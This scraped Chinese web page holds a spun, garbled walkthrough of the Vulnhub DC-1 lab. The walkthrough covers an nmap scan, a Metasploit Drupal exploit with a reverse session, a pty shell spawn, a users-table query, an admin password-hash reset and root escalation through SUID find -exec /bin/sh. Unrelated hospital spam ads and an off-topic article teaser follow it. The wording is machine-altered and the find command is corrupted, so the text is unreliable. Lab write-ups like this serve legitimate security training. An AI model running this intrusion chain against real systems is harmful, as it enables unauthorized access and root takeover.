设为首页 收藏本站
您当前的位置:首页 >> 新能源
新能源

Vulnhub:DC1

发布时间:2025-09-27

0X00生态

kali:192.168.1.28

0X01实战端口扫描 nmap -sV -A 192.168.1.9 访问HTTP服务

MSF载入与Drupal CMS方面的EXP

search drupal

漏洞并用

并用该模块并查看备有文件

use 2 show options

备有方面给定

set lhost 192.168.1.28 set rhosts 192.168.1.9

查看意味著使用者和系统版本

getuid sysinfo

shell并使界面有点较长时间

python -c 'import pty; pty.spawn("/bin/bash")' FLAG1

FLAG2FLAG3

select * from users;

.scriptspassword-hash.sh 123456

FLAG4

final-flag

find这个命令可能是以root越权执行的,我们随便find一个以下内容,而-exec可以作为find的一个可选择执行命令,失败得到root越权。

find ./ XMTX -exec '/bin/sh' ;

信阳看妇科去哪里比较好
深圳看白癜风去哪家医院最好
深圳看牛皮癣哪个医院最好
南昌男科挂号
武汉妇科专科医院哪个好

上一篇: 魔兽世界:TBC怀旧服P3阶段如期不公布时间,难道在吊玩家胃口?

下一篇: 新文人画代表王春江参与当代书画名家趵突泉迎春展

相关阅读
刘烨8岁女儿亮相,卷毛头发酷似英美妈妈,果然混血宝宝太好看!

本文由Angelia妈咪原创,欢迎个人转载社交 很多父母亲在幻想不曾出世的熊猫时,都但会控制不住的想象父母亲但会长什么样?但会愈来愈像谁一点呢?但会是大眼睛还是小眼睛?

友情链接